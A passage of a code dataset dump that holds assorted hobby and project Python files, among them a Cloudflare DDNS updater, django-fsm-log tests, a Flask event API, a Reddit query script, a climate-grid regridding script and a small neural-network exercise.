log_level.lower() == \"info\":\n log_level = logging.INFO\n elif log_level.lower() == \"warning\":\n log_level = logging.WARNING\n else:\n log_level = logging.DEBUG\n log_format = 
\"%(asctime)s - %(levelname)s - %(message)s\"\n logging.basicConfig(filename=log_settings[\"logFileName\"], level=log_level,format=log_format)\n\n @staticmethod\n def read_settings():\n DDNS.ip_url = DDNS.settings_manager.get_ip_url()\n DDNS.domain_settings = DDNS.settings_manager.get_domain_settings()\n\n @staticmethod\n def main(settings_path=\"cloudflareddnsSettings.json\"):\n DDNS.settings_manager = SettingsManager(settings_path)\n if not DDNS.settings_manager.is_valid:\n sys.exit(1)\n DDNS.init_logging()\n DDNS.read_settings()\n if not DDNS.settings_manager.is_valid:\n logging.error(\"Bad configuration.\")\n sys.exit(1)\n else:\n pass\n # logging.info(\"--------DDNS script started--------\")\n DDNS.ip_addrs[\"A\"] = str(urlopen(DDNS.ip_url[\"A\"]).read(), encoding='utf-8').strip()\n DDNS.ip_addrs[\"AAAA\"] = str(urlopen(DDNS.ip_url[\"AAAA\"]).read(), encoding='utf-8').strip()\n for single_domain_config in DDNS.domain_settings:\n dm = DomainRecordChanger(single_domain_config, DDNS.ip_addrs)\n dm.start_ddns()\n # logging.info(\"---------DDNS script ended---------\")\n","repo_name":"un-lock-able/cloudflare-ddns","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29184861282","text":"#resolver erro ModuleNotFoundError: No module named 'win32serviceutil' \n#https://stackoverflow.com/a/70625723/9930021\nimport os\nimport sys\nimport site\n\nservice_directory = os.path.dirname(__file__)\nsource_directory = os.path.abspath(service_directory)\nos.chdir(source_directory)\nvenv_base = os.path.abspath(os.path.join(source_directory, \"venv\"))\nsys.path.append(\".\")\nold_os_path = os.environ['PATH']\nos.environ['PATH'] = os.path.join(venv_base, \"Scripts\") + os.pathsep + old_os_path\nsite_packages = os.path.join(venv_base, \"Lib\", \"site-packages\")\nprev_sys_path = list(sys.path)\nsite.addsitedir(site_packages)\nsys.real_prefix = sys.prefix\nsys.prefix = venv_base\n\nnew_sys_path = list()\nfor item in list(sys.path):\n if item not in prev_sys_path:\n new_sys_path.append(item)\n sys.path.remove(item)\nsys.path[: 0] = new_sys_path\n\nimport time\nimport random\nfrom pathlib import Path\nfrom SMWinservice import SMWinservice\n\nclass MyServicePython(SMWinservice):\n _svc_name_ = \"MyServicePython\"\n _svc_display_name_ = \"My Service Python\"\n _svc_description_ = \"Simple service in python for windows\"\n\n def start(self):\n self.isrunning = True\n\n def stop(self):\n self.isrunning = False\n\n def main(self):\n i = 0\n while self.isrunning:\n random.seed()\n x = random.randint(1, 1000000)\n Path(f'c:{x}.txt').touch()\n time.sleep(5)\n\nif __name__ == '__main__':\n MyServicePython.parse_command_line()\n","repo_name":"ugleiton/python_windows_service","sub_path":"my_service_windows.py","file_name":"my_service_windows.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31209683378","text":"from unittest import skipIf\nfrom django.test import TestCase\n\nfrom django_fsm_log.models import StateLog\nfrom django_fsm_log.managers import PendingStateLogManager\n\nfrom .models import Article\nfrom mock import patch\n\ntry:\n from django_fsm import TransitionNotAllowed\n DJANGO_FSM_VER_1 = False\nexcept ImportError: # django_fsm 1.x\n DJANGO_FSM_VER_1 = True\n from django_fsm.db.fields import TransitionNotAllowed\n\ntry:\n from django.contrib.auth import 
get_user_model\nexcept ImportError: # django < 1.5\n from django.contrib.auth.models import User\nelse:\n User = get_user_model()\n\n\nclass StateLogModelTests(TestCase):\n def setUp(self):\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n\n def test_get_available_state_transitions(self):\n self.assertEqual(len(list(self.article.get_available_state_transitions())), 2)\n\n @skipIf(DJANGO_FSM_VER_1, 'requires django-fsm>1')\n def test_get_all_state_transitions(self):\n self.assertEqual(len(list(self.article.get_all_state_transitions())), 4)\n\n def test_log_created_on_transition(self):\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n self.article.submit()\n self.article.save()\n\n self.assertEqual(len(StateLog.objects.all()), 1)\n\n def test_log_not_created_if_transition_fails(self):\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n with self.assertRaises(TransitionNotAllowed):\n self.article.publish()\n self.article.save()\n\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n def test_by_is_set_when_passed_into_transition(self):\n self.article.submit(by=self.user)\n\n log = StateLog.objects.all()[0]\n self.assertEqual(self.user, log.by)\n\n def test_by_is_none_when_not_set_in_transition(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertIsNone(log.by)\n\n def test_logged_state_is_new_state(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.state, 'submitted')\n\n def test_logged_transition_is_name_of_transition_method(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.transition, 'submit')\n\n def test_logged_content_object_is_instance_being_transitioned(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.content_object, self.article)\n\n\nclass StateLogManagerTests(TestCase):\n def setUp(self):\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n\n def test_for_queryset_method_returns_only_logs_for_provided_object(self):\n article2 = Article.objects.create(state='draft')\n article2.submit()\n\n self.article.submit()\n self.article.publish()\n\n self.assertEqual(len(StateLog.objects.for_(self.article)), 2)\n for log in StateLog.objects.for_(self.article):\n self.assertEqual(self.article, log.content_object)\n\n\nclass PendingStateLogManagerTests(TestCase):\n def setUp(self):\n if not hasattr(StateLog, 'pending_objects'):\n StateLog.add_to_class('pending_objects', PendingStateLogManager())\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n self.create_kwargs = {\n 'by': self.user,\n 'state': 'submitted',\n 'transition': 'submit',\n 'content_object': self.article\n }\n\n def test_get_cache_key_for_object_returns_correctly_formatted_string(self):\n expected_result = 'StateLog:{}:{}'.format(\n self.article.__class__.__name__,\n self.article.pk\n )\n result = StateLog.pending_objects._get_cache_key_for_object(self.article)\n self.assertEqual(result, expected_result)\n\n @patch('django_fsm_log.managers.cache')\n def test_create_pending_sets_cache_item(self, mock_cache):\n expected_cache_key = StateLog.pending_objects._get_cache_key_for_object(self.article)\n StateLog.pending_objects.create(**self.create_kwargs)\n cache_key = mock_cache.set.call_args_list[0][0][0]\n cache_object = 
mock_cache.set.call_args_list[0][0][1]\n self.assertEqual(cache_key, expected_cache_key)\n self.assertEqual(cache_object.state, self.create_kwargs['state'])\n self.assertEqual(cache_object.transition, self.create_kwargs['transition'])\n self.assertEqual(cache_object.content_object, self.create_kwargs['content_object'])\n self.assertEqual(cache_object.by, self.create_kwargs['by'])\n\n @patch('django_fsm_log.managers.cache')\n def test_create_returns_correct_state_log(self, mock_cache):\n log = StateLog.pending_objects.create(**self.create_kwargs)\n self.assertEqual(log.state, self.create_kwargs['state'])\n self.assertEqual(log.transition, self.create_kwargs['transition'])\n self.assertEqual(log.content_object, self.create_kwargs['content_object'])\n self.assertEqual(log.by, self.create_kwargs['by'])\n\n @patch('django_fsm_log.managers.cache')\n def test_commit_for_object_saves_log(self, mock_cache):\n log = StateLog.objects.create(**self.create_kwargs)\n mock_cache.get.return_value = log\n StateLog.pending_objects.commit_for_object(self.article)\n persisted_log = StateLog.objects.order_by('-pk').all()[0]\n self.assertEqual(log.state, persisted_log.state)\n self.assertEqual(log.transition, persisted_log.transition)\n self.assertEqual(log.content_object, persisted_log.content_object)\n self.assertEqual(log.by, persisted_log.by)\n\n @patch('django_fsm_log.managers.cache')\n def test_commit_for_object_deletes_pending_log_from_cache(self, mock_cache):\n StateLog.pending_objects.create(**self.create_kwargs)\n StateLog.pending_objects.commit_for_object(self.article)\n mock_cache.delete.assert_called_once_with(StateLog.pending_objects._get_cache_key_for_object(self.article))\n\n @patch('django_fsm_log.managers.cache')\n def test_get_for_object_calls_cache_get_with_correct_key(self, mock_cache):\n cache_key = StateLog.pending_objects._get_cache_key_for_object(self.create_kwargs['content_object'])\n StateLog.pending_objects.get_for_object(self.create_kwargs['content_object'])\n mock_cache.get.assert_called_once_with(cache_key)\n","repo_name":"smaggs/django-fsm-log","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"391580017","text":"import os\n\ndef read_from_file(filename):\n file_path = os.path.join(\n os.path.dirname(__file__), filename)\n result = list()\n with open(file_path) as fh:\n lines = fh.read().split('\\n')\n for line in lines:\n result.extend([int(num) for num in line.split(',')])\n return result\n\ndef main():\n x, y, z = 0, 0, 0\n inputs = read_from_file('input.txt')\n for i in inputs:\n for j in inputs:\n for k in inputs:\n if i == j or i == k or j == k:\n continue\n if i + j + k == 2020:\n x = i\n y = j\n z = k \n break\n if x and y and z:\n break\n if x and y and z:\n break\n print(x, y, z, x+y+z)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ayushlalshrestha/coding-challenges","sub_path":"adventofcode/2020/day1/1_1_advent.py","file_name":"1_1_advent.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9824261559","text":"import logging\nfrom flask import Flask\nfrom example_1.entrypoint import (\n create_container,\n register_aggregated_uow_hooks,\n register_runtime_message_dispatcher,\n create_message_dispatcher_uow,\n)\nfrom example_1.flask_app.app import configure_app\nfrom pocpoc.api.utils.debugging import 
setup_debug_logging\n\n\ncontainer = create_container()\nregister_runtime_message_dispatcher(container)\nregister_aggregated_uow_hooks(container, create_message_dispatcher_uow)\n\napp = Flask(__name__)\n\nsetup_debug_logging(\"example_1.*\", level=logging.DEBUG)\n\n# setup_debug_logging(\n# \"pocpoc*\",\n# level=logging.INFO,\n# )\n\n# setup_debug_logging(\n# \"flask*\",\n# level=logging.INFO,\n# )\n\nconfigure_app(app, container.get_class_initializer())\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"LuscasLeo/pocpoc","sub_path":"src/example_1/flask_app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42362601088","text":"import regridcart as rc\nimport xarray as xr\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom matplotlib import pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport cmocean.cm as cmo\nimport hvplot.xarray\nimport geoviews as gv\n\n# PICK UP\n# need the crs of mar, it should be in a 'grid-mapping' variable but there isn't one, need to search through old notes \n\n# %% open the dataset and get the main info\nds = xr.open_dataset(\"/Users/coop558/work/data/greenland/mar3.11/MARv3.11-ERA5-15km-2018.nc\")\n\n# try to assing the lat.lon to x,y coords\nds = ds.assign_coords(lon=ds.LON,lat=ds.LAT)\n\n# other options: chunks, chunksizes, dtypes, encoding, imag, loc, nbytes, real, xindexes\nvariables = ds.data_vars\ndims = ds.dims\natts = ds.attrs\ncoords = ds.coords\nidxs = ds.indexes\nsizes = ds.sizes\ntime = ds.TIME\n\n# %% build a time array\nt1 = datetime(2018,1,1,0,0,0)\nt2 = datetime(2019,1,1,0,0,0)\ndt = timedelta(hours=1)\nt = np.arange(t1,t2,dt).astype(datetime)\n\n# %% read the melt and runoff for a single grid cell\n\n# idx 54,21 should be good ones for cheecking based on ncrowcol but don't seem to be \nmelt = ds.MEH.sel(Y21_199=54,X10_105=21,method='nearest')\nmelt = melt.values.flatten()\nmelt = np.cumsum(melt/1000)\nplt.plot(t,melt)\n\n# get the lat lon value for the grid cell\nlatp = ds.LAT.sel(Y21_199=54,X10_105=21,method='nearest')\nlonp = ds.LON.sel(Y21_199=54,X10_105=21,method='nearest')\n\n# %% read the melt and runoff for a single grid cell using the lat lon values\n\n# extract all lat lon values from the ds\nlatv = ds.LAT.values.flatten()\nlonv = ds.LON.values.flatten()\n\n# set the lat lon for the point\nlat0 = 67.035\nlon0 = -48.90\n\n# find the index of the point on the grid\nidx = np.argmin(np.abs(latv-lat0)+np.abs(lonv-lon0))\n\n# get the melt timeseries for the point\nmelt = ds.MEH.values.flatten()[idx]\n\n# plot the melt timeseries\nmelt = np.cumsum(melt/1000)\nplt.plot(melt)\n\n# this selects one grid cell and flattens but the values are all zero\n# runoff = ds.MEH.sel(Y21_199=54,X10_105=21,method='nearest')\n# runoff = runoff.values.flatten()\n# pl.plot(t,runoff)\n# runoff.max()\n\n# %% compute the time-average and make a map\n\n# I could not figure out how to unstack with xarray, so use np (converts to ndarray)\nMEH = ds.MEH/1000\nMEH = MEH.stack(hour=('TIME','ATMXH'))\nMEH = MEH.cumsum(dim='hour')\nMEH = MEH.mean(dim='hour')\n\n# MEH = np.vstack(MEH)\n# MEH = np.cumsum(MEH,axis=0)\n# MEH = np.mean(MEH,axis=0)\n\nfig, ax = plt.subplots()\nMEH.plot(x='lon',y='lat')\n\nfig, ax = plt.subplots()\nMEH.plot()\n\n# add a symbol for the location of the time series\nax.plot(-41.18,71.4,'r*',transform=ccrs.PlateCarree())\n\n\n# 
%% make a map\n\n# proj = ccrs.NorthPolarStereo(central_longitude=-40,true_scale_latitude=70)\n# proj = ccrs.Stereographic(central_latitude=70,central_longitude=-40)\n# proj = ccrs.NorthPolarStereo()\ncoast_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m',\n edgecolor='k', facecolor='0.8')\nproj = ccrs.LambertConformal()\nfig, ax = plt.subplots(1, 1, sharex=True, sharey=True, figsize=(10, 5),\n subplot_kw={'projection': proj})\nMEH.plot(x='lon', y='lat',transform=proj,cmap=cmo.haline, ax=ax)\n# ax.add_feature(coast_10m)\nax.set_extent([-70, -40, 60, 75], crs=proj)\nax.set_title('')\ngl = ax.gridlines(draw_labels=True, x_inline=False, y_inline=False, \n xlocs=np.arange(-70,-40, 5), ylocs=np.arange(60, 75, 5))\n\n# manipulate `gridliner` object to change locations of labels\ngl.top_labels = False\ngl.right_labels = False\n\n\n# %%\n\n# lat0 = ds.lat.mean()\n# lon0 = ds.lon.mean()\n\ntarget_domain = rc.LocalCartesianDomain(\n central_latitude=71.4,\n central_longitude=-41.18,\n l_meridional=3000.0e3,\n l_zonal=2000.0e3,\n)\ntarget_domain.plot_outline()\n# target_domain.latlon_bounds\n\n\ndx = 15.0e3 # new resoluion 1km\nda_regridded = rc.resample(target_domain, da=MEH, dx=dx)\n\n\nfig, ax = plt.subplots()\nda_regridded.plot()\n\n\n# %%\n","repo_name":"mgcooper/remap","sub_path":"test_regridding.py","file_name":"test_regridding.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18700279537","text":"# Author : Abilash1907\ndef compare(s1, s2):\n m = len(s1)\n n = len(s2)\n j = 0\n i = 0\n while (i < n and j < m):\n if (s1[j] == s2[i]):\n j += 1\n i += 1\n return (j == m)\n\n\ndef longest(d, st):\n r = \"\"\n le = 0\n for i in d:\n if (le < len(i) and compare(i, st)):\n r = i\n le = len(i)\n return r\nn = int(input())\nl = input(\"dict=\").split(' ')\nl = {n for n in l}\ns = input(\"str=\")\nprint(longest(l, s))\n","repo_name":"Developers-VAST/Code-Hack","sub_path":"Solutions/solution6.py","file_name":"solution6.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"4405420478","text":"from collections import defaultdict\n\n\ndef min_rewards(scores):\n rewards = [1] * len(scores)\n for i in range(1, len(scores)):\n if scores[i] > scores[i - 1]:\n rewards[i] = rewards[i - 1] + 1\n\n for i in range(len(scores) - 2, -1, -1):\n if scores[i] > scores[i + 1]:\n rewards[i] = max(rewards[i], rewards[i + 1] + 1)\n return sum(rewards)\n\nif __name__ == '__main__':\n scores = [8, 4, 2, 1, 3, 6, 7, 9, 5]\n expected = 25\n print(f\"Actual result: {min_rewards(scores)}. 
Expected: {expected}\")","repo_name":"tung491/algo-expert-2021","sub_path":"array/min_rewards/min_rewards.py","file_name":"min_rewards.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21153820546","text":"import nltk, re, string\n\n\ndef normalization(user_input):\n \"\"\" Remove punctuation and tokenize the text \"\"\"\n \n regex = re.compile('[%s]' % re.escape(string.punctuation))\n user_input = regex.sub('', user_input)\n return user_input.split()\n\n\ndef two_syllable_words():\n \"\"\" Find two-syllable words in CMU Pronouncing Dictionary \"\"\"\n \n entries = nltk.corpus.cmudict.entries()\n # a syllable must contain a vowel, the following list contains all different vowel sounds\n vowels = re.compile(r'AA|AE|AH|AO|AW|AX|AXR|AY|EH|ER|EY|IH|IX|IY|OW|OY|UH|UW|UX|AX-H')\n \n words = []\n for word in entries:\n phon_count = 0\n for phon in word[1]:\n if re.match(vowels, phon): # if the phon is a vowel\n phon_count += 1\n if phon_count == 2: # if there are two vowels in the word, append it to a list\n words.append(word[0])\n \n return words\n\n\ndef main():\n user_input = input(\"Enter English text: \").lower()\n user_input = normalization(user_input)\n two_syllable = two_syllable_words()\n matches = [w for w in user_input if w in two_syllable]\n print(\"Following two-syllable words were found:\", end=' ')\n print(', '.join(w for w in matches))\n\n\nmain()\n\n","repo_name":"majosaurus/uni-garbage","sub_path":"machine_learning/01_06_homework.py","file_name":"01_06_homework.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23597352074","text":"#!/usr/bin/python3\n\"\"\"Queries the Reddit API\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"returns first 10 posts from Reddit API\"\"\"\n\n url = \"https://www.reddit.com/r/\" + subreddit + \"/hot.json?limit=10\"\n header = {\"User-Agent\": \"Test\"}\n r = requests.get(url, headers=header)\n if r.status_code == 200:\n for item in r.json().get(\"data\", None).get(\"children\", None):\n print(item.get(\"data\", None).get(\"title\", None))\n else:\n print(None)\n\n\nif __name__ == \"__main__\":\n top_ten('programing')\n","repo_name":"luiseduardiazc/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25210324494","text":"from superdesk.resource import Resource\n\nfrom .enums import ConceptNature\n\n\nCONCEPT_ITEMS_PRIVELEGE = \"concept_items\"\n\n\nclass ConceptItemsResource(Resource):\n \"\"\"Concept item schema\"\"\"\n\n schema = {\n \"name\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"group_id\": {\"type\": \"string\", \"required\": False, \"empty\": False, \"readonly\": False},\n \"definition_text\": {\"type\": \"string\", \"required\": False, \"empty\": False, \"readonly\": True},\n \"definition_html\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"language\": {\"type\": \"string\", \"required\": True, \"empty\": False},\n \"labels\": {\"type\": \"list\", \"schema\": {\"type\": \"string\"}, \"unique_list\": True},\n # http://cv.iptc.org/newscodes/cpnature/\n \"cpnat_type\": {\"type\": \"string\", \"required\": True, \"allowed\": ConceptNature.values()},\n # 
https://iptc.org/std/NewsML-G2/guidelines/#more-real-world-entities\n \"properties\": {\"type\": \"dict\", \"required\": False},\n \"created_by\": Resource.rel(\"users\", embeddable=False, readonly=True),\n \"updated_by\": Resource.rel(\"users\", embeddable=False, readonly=True),\n # system fields\n \"_type\": {\"type\": \"string\"},\n }\n privileges = {\n \"PATCH\": CONCEPT_ITEMS_PRIVELEGE,\n \"PUT\": CONCEPT_ITEMS_PRIVELEGE,\n \"DELETE\": CONCEPT_ITEMS_PRIVELEGE,\n }\n item_url = 'regex(\"[a-f0-9]{24}\")'\n resource_methods = [\"GET\", \"POST\"]\n item_methods = [\"GET\", \"PATCH\", \"PUT\", \"DELETE\"]\n query_objectid_as_string = False\n mongo_indexes = {\n \"name_collation\": ([(\"name\", 1)], {\"collation\": {\"locale\": \"en\", \"strength\": 1}}),\n \"definition_text_collation\": (\n [\n (\"definition_text\", 1),\n ],\n {\"collation\": {\"locale\": \"en\", \"strength\": 1}},\n ),\n \"group_id\": ([(\"group_id\", 1), (\"language\", 1)], {\"unique\": True}),\n }\n","repo_name":"superdesk/superdesk-core","sub_path":"apps/concept_items/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"28586887641","text":"from flask import Flask, render_template, request\nimport sqlite3\nimport json\n\napp = Flask('__name__')\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/createevent')\ndef createevent(methods=['GET', 'POST']):\n\n name = request.args.get('name')\n print(name)\n\n link = request.args.get('link')\n print(link)\n\n starttime = request.args.get('starttime')\n print(starttime)\n\n conn = sqlite3.connect('database/events.db')\n\n cursorcurrentid = conn.execute(\"SELECT currentID from CURRENT\")\n for row in cursorcurrentid:\n print(\"CurrentID is \", row[0])\n currentId = str(row[0])\n\n conn.execute(\"\"\"INSERT INTO EVENTS (id, name, link, starttime) \\\n VALUES (?, ?, ?, ?)\"\"\", (currentId, name, link, starttime))\n\n newcurrentid = str(int(currentId) + 1)\n conn.execute(\"UPDATE CURRENT set currentID = ? where currentID = ?\",\n (newcurrentid, currentId))\n\n conn.commit()\n conn.close()\n\n return 'thisreturnstatementdoesntmatter'\n\n@app.route('/getEvents')\ndef getEvents(methods=['GET', 'POST']):\n conn = sqlite3.connect('database/events.db')\n cursor = conn.execute(\"SELECT id, name, link, starttime from EVENTS\")\n\n jsonSerializableEvents = []\n\n for eventRow in cursor:\n jsonSerializableEvents.append(eventRow)\n\n dumpedEvents = json.dumps(jsonSerializableEvents)\n loadedEvents = json.loads(dumpedEvents)\n\n conn.close()\n\n return str(loadedEvents)\n\n\nif __name__ == '__main__':\n # ! 
Remove debug = True after development\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"theamazing0/hackja-main","sub_path":"keep-on-track-server/keepOnTrackServer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24939360711","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 14:25:13 2019\n\n@author: farhan\n\"\"\"\n\nimport numpy as np\nimport sys\nimport random\n\n# our nonlinear function (and its derivative); lam = 1 (so fixed)\ndef sigmoid(x, derive=False):\n if derive:\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n###################################################################################################################3\ndef tanh(x, derive=False):\n if derive:\n return (1 - x*x)\n return (np.exp(2*x)-1) / (1 + np.exp(2*x))\n###################################################################################################################\n#Mean Squared Error\ndef msqe(d,y,derive=False):\n if derive == True:\n return -1*(d-y)\n return 0.5 * (d-y)*(d-y)\n###################################################################################################################\n\n\n# define the XOR data set\nX =np.array([\n [0.0, 0.0, 0.8, 0.4, 0.4, 0.1, 0.0, 0.0, 0.0],\n [0.0, 0.3, 0.3, 0.8, 0.3, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.3, 0.3, 0.8, 0.3, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.8, 0.4, 0.4, 0.1],\n [0.8, 0.4, 0.4, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.3, 0.3, 0.8, 0.3]])\n\n # its labels\ny = np.array([\n [-1],\n [1],\n [1],\n [-1],\n [-1],\n [1]])\n\n# learning rate\neta = 0.2\n\n# initialize weights with random numbers\n#n1_w = np.random.normal(0,1,(3, 1))\n#n2_w = np.random.normal(0,1,(3, 1))\n#n3_w = np.random.normal(0,1,(3, 1))\n\nn1_w = green_ = np.array([1.73673761, 1.89791391, -2.10677342, -0.14891209, 0.58306155])\n\nn2_w = orange_ = np.array([-2.25923303, 0.13723954, -0.70121322, -0.62078008, -0.47961976])\n\nn3_w = wout_ = np.array([1.20973877, -1.07518386, 0.80691921, -0.29078347, -0.22094764, -0.16915604, 1.10083444, 0.08251052, \n -0.00437558, -1.72255825, 1.05755642, -2.51791281, -1.91064012])\n\n###############################################\n# Epochs\n###############################################\nepoch = 1 #1000 # how many epochs? 
(each epoch will pass all 4 data points through)\nerr = np.zeros((epoch,1)) # lets record error to plot (get a convergence plot)\ninds = np.asarray([0,1,2,3,4,5]) # array of our 4 indices (data point index references)\nfor k in range(1): \n \n # init error\n err[k] = 0 \n \n # random shuffle of data each epoch\n \n #inds = np.random.permutation(inds)\n \n for i in range(4): \n \n # what index?\n inx = inds[i]\n \n # forward pass\n v = np.ones((12, 1))\n \n for i in range (6):\n v[i] = np.dot(X[i:i+4],n1_w[0:4])+n1_w[4]\n v[i] = tanh[v[i]]\n for i in range (6,12):\n v[i] = np.dot(X[i-6:i-6+4],n2_w[0:4])+n2_w[4]\n v[i] = tanh[v[i]]\n \n \n #v[0] = np.dot(X[inx,:], n1_w) # neuron 1 fires (x as input)\n #v[0] = tanh(v[0]) # neuron 1 sigmoid\n #v[1] = np.dot(X[inx,:], n2_w) # neuron 2 fires (x as input)\n #v[1] = sigmoid(v[1]) \n \n oo = np.dot(np.transpose(v), n3_w) # neuron 3 fires, taking neuron 1 and 2 as input\n o = tanh(oo) # hey, result of our net!!!\n \n # error\n err[k] = err[k] + ((1.0/2.0) * np.power((o - y[inx]), 2.0))\n \n # backprop time!!!\n \n # output layer\n delta_1 = o - y[inx]\n delta_2 = tanh(o,derive=True)\n # now, lets prop it back to the weights\n delta_ow = np.ones((13, 1))\n # format is\n # delta_index = (input to final neuron) * (Err derivative * Sigmoid derivative)\n \n for l in range(12):\n delta_ow[l] = v[l] * (delta_1*delta_2)\n \n delta_ow[12] = 1 * (delta_1*delta_2)\n \n #delta_ow[0] = v[0] * (delta_1*delta_2)\n #delta_ow[1] = v[1] * (delta_1*delta_2)\n #delta_ow[2] = v[2] * (delta_1*delta_2)\n #print(v[2])\n \n \n # neuron n1\n \n #delta_3 = tanh(v[0],derive=True)\n delta_n = np.ones((12,1))\n delta_n = delta_n.squeeze()\n \n for l in range(12): #neuron n1 to n12\n delta_n[l] = tanh(v[l],derive=True)\n \n # same, need to prop back to weights\n delta_hw1 = np.zeros((5, 1))\n # format\n # input this Tanh der error from output weight to output neuron\n for l in range(4):\n for m in range(6):\n delta_hw1[l] = X[inx,l+m] * delta_n[m] * ((delta_1*delta_2) *n3_w[m])\n \n #for j in range(4):\n # for i in range (6):\n # delta_green[j] += X[j+i] * tanh(V_tanh[i], True) * delta_Ey * delta_yv * wout[i]\n # delta_orange[j] += X[j+i] * tanh(V_tanh[i+6], True) * delta_Ey * delta_yv * wout[i+6]\n \n #delta_hw1[0] = X[inx,0] * delta_n[] * ((delta_1*delta_2) *n3_w[0])\n #delta_hw1[1] = X[inx,1] * delta_n[] * ((delta_1*delta_2) *n3_w[0])\n #delta_hw1[2] = X[inx,2] * delta_n[] * ((delta_1*delta_2) *n3_w[0]) \n \n # neuron n2\n delta_4 = sigmoid(v[1],derive=True)\n # same, need to prop back to weights \n delta_hw2 = np.ones((5, 1))\n delta_hw2[0] = X[inx,0] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n delta_hw2[1] = X[inx,1] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n delta_hw2[2] = X[inx,2] * delta_4 * ((delta_1*delta_2) *n3_w[1])\n \n # update rule, so old value + eta weighted version of delta's above!!!\n n1_w = n1_w - eta * delta_hw1\n n2_w = n2_w - eta * delta_hw2\n n3_w = n3_w - eta * delta_ow\n ","repo_name":"farhanquadir/Project_Compilation","sub_path":"NN_Class/NN_Shared_weights.py","file_name":"NN_Shared_weights.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36198237344","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import mpl_toolkits.mplot3d.axes3d as p3\nimport matplotlib.animation as animation\nfrom scipy.integrate import odeint\n\nG = 6.67430 * 10**(-11) # gravitational constant\nc = 299792458.0 # speed of light\nAU = 1.495978707 * 10**11 # 
